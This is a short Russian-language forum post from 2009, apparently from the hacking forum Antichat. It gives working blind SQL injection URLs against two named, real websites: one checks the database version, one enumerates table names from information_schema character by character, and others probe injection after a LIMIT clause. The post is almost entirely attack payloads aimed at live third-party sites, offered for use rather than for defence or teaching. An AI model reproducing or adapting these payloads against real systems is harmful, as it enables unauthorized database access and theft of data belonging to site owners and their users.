18.03.2009, 19:22
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
s_p_a_m
Там INSERT
http://www.zork.name/?view=2)+and+substring(version(),1,1)=(5
вот перебор, если нужен
http://www.zork.name/?view=2)+AND+ascii(lower(substring((select+table_n ame+from+information_schema.tables+limit+17,1),1,1 )))<(53
===============================
Сообщение от ElteRUS
А инъекция после лимита возможна. Более чем )
Давай посмотрим реализацию  Например тут:
http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140'
http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140,2--+
Ну или твой вариант с удовольствием посмотрю. С "ORDER BY", что-бы всё как положено
Последний раз редактировалось jokester; 18.03.2009 в 19:51..
|
|
|